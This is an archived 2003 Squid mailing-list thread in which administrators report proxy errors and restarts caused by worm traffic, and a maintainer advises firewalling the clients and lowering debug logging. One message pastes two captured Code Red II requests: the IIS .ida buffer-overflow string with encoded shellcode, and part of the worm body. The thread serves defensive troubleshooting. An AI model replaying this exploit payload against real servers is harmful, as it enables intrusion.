Re: [squid-users] parseHttpRequest: Unsupported Method 'somestrangestring' from Wei Keong on 2003-04-11 (squid-users)

From: Wei Keong <chooweikeong@dont-contact.us>
Date: Sat, 12 Apr 2003 10:22:53 +0800 (Singapore Standard Time)

Hi Ralf,

We had encountered this too. Please see Henrik reply below...

Rgds,
Wei Keong

---------- Forwarded message ----------
Date: 04 Apr 2003 12:53:12 +0200
From: Henrik Nordstrom <hno@squid-cache.org>
To: Wei Keong <chooweikeong@pacific.net.sg>
Cc: squid-users@squid-cache.org
Subject: Re: [squid-users] New Code Red?

It is not much that can be done for this kind of problems except to
block the offending client stations by firewalling.

One thing which may make the "400 Bad Request" worse for Squid is that
these also get logged in detail in cache.log. If you cannot firewall the
user then you might want to change debug_options to

debug_options ALL,1 33,0

to temporarily disable most error reporting on client side request
processing.

Regards
Henrik

tor 2003-04-03 klockan 18.02 skrev Wei Keong:
> Hi,
>
> We are seeing a possible new code red. Each victim will flood to a
> particular destination. Unlike the original one, this one does not have
> send proper HTTP method. Although Squid will return Bad Request, this
> attack will consume a lot of resources and bring down the Squid box...
>
> Anybody catches the same thing? It seems to us that DENIED/403
> requires less processing than returning NONE/400 or NONE/411. If this it
> true, is there anyway to deny these requests?
>
>
> GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> X%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u685
> 8%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53f
> f%u0078%u0000%u00=a HTTP/1.0..Content-type: text/xml.Conten
> t-length: 3379 ........`........dg.6..dg.&.......h......\...
> P.U...\...P.U..@.....X....U.=.......=..............T....u..~
> 0...........F0.........CodeRedII...$.U.f.....8.....P.......j
> ...P...P..8...P.E..p.........8....thS.U..U..E.i.T...,.....,.
> .............F4.E.Pj..u...........j.j..U.P.U.Ou..;...i.T....
> \&....\&.W.U.j.j..U.j..U....F4)E.jd.U...<...P.U....<...=....
> s....>......s.f..p.....f..r....P.d.....t...j.j.j..U....t..E.
> j.Th~f...u..U.Yj...p...P.u..U........tK3..U.=3'..u?..h......
> ...l.........`........E...d.....h...Pj...`...Pj.j..U..j.Th~f
> ...u..U.Y...u1.....X-....j.h....P.u..U.=....u.j.j...\...P.u.
> .U..u..U..........w...........xu......`......d$.dg....Xa..dg
> .6..dg.&..f.;MZu..K<.<.PE..u..T.x...B..<.KERNu..|..EL32u.3.I
> .r ...A..<.GetPu..|..rocAu..J.I...J$........J.......D$$dg...
> .Xa..Q....]..E......LoadLibraryA..u..U..E......CreateThread.
> .u..U..E......GetTickCount..u..U..E......Sleep..u..U..E.....
> .GetSystemDefaultLangID..u..U..E......GetSystemDirectoryA..u
> ..U..E......CopyFileA..u..U..E......GlobalFindAtomA..u..U..E
> ......GlobalAddAtomA
>
>
> Squid 2.4S6 reply: HTTP/1.0 411 Length Required.
>
>
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780
> 1%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0
> 0%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0..Host: xxx.xx.xxx.x
> x..Content-type: text/xml.Content-length: 3379 ..Cache-Contr
> ol: max-stale=0........`........dg.6..dg.&.......h......\...
> P.U...\...P.U..@.....X....U.=.......=..............T....u..~
> 0...........F0.........CodeRedII...$.U.f.....8.....P.......j
> ...P...P..8...P.E..p.........8....thS.U..U..E.i.T...,.....,.
> .............F4.E.Pj..u...........j.j..U.P.U.Ou..;...i.T....
> \&....\&.W.U.j.j..U.j..U....F4)E.jd.U...<...P.U....<...=....
> s....>......s.f..p.....f..r....P.d.....t...j.j.j..U....t..E.
> j.Th~f...u..U.Yj...p...P.u..U........tK3..U.=3'..u?..h......
> ...l.........`........E...d.....h...Pj...`...Pj.j..U..j.Th~f
> ...u..U.Y...u1.....X-....j.h....P.u..U.=....u.j.j...\...P.u.
> .U..u..U..........w...........xu......`......d$.dg....Xa..dg
> .6..dg.&..f.;MZu..K<.<.PE..u..T.x...B..<.KERNu..|..EL32u.3.I
> .r ...A..<.GetPu..|..rocAu..J.I...J$........J.......D$$dg...
> .Xa..Q....]..E......LoadLibraryA..u..U..E......CreateThread.
> .u..U..E......GetTickCount..u..U..E......Sleep..u..U..E.....
> .GetSystemDefaultLangID..u..U..E......GetSystemDirectoryA..u
> ..U..E......CopyFileA..u..U..E......GlobalFindAtomA..u..U..E
> ......Global
>
>
> Squid 2.4S6 reply: HTTP/1.0 400 Bad Request.
>
>
>
> Thanks,
> Wei Keong

On Fri, 11 Apr 2003, Ralf Hildebrandt wrote:

> * mailinglists <mailinglists@belfin.ch>:
>
> > I got this here in my cache.log.
> > Squid 2.3stable4 is restarting upon it. I think it's some kind of an attack.
> >
> > parseHttpRequest: Unsupported method 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0
> > 0%u531b%u53ff%u0078%u0000%u00=a'
>
> Looks like a buffer overrun attempt with shellcode
>
> --
> Ralf Hildebrandt (Im Auftrag des Referat V a) Ralf.Hildebrandt@charite.de
> Charite Campus Mitte Tel. +49 (0)30-450 570-155
> Referat V a - Kommunikationsnetze - Fax. +49 (0)30-450 570-916
> AIM: ralfpostfix
>
Received on Fri Apr 11 2003 - 20:16:42 MDT

This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 17:14:57 MST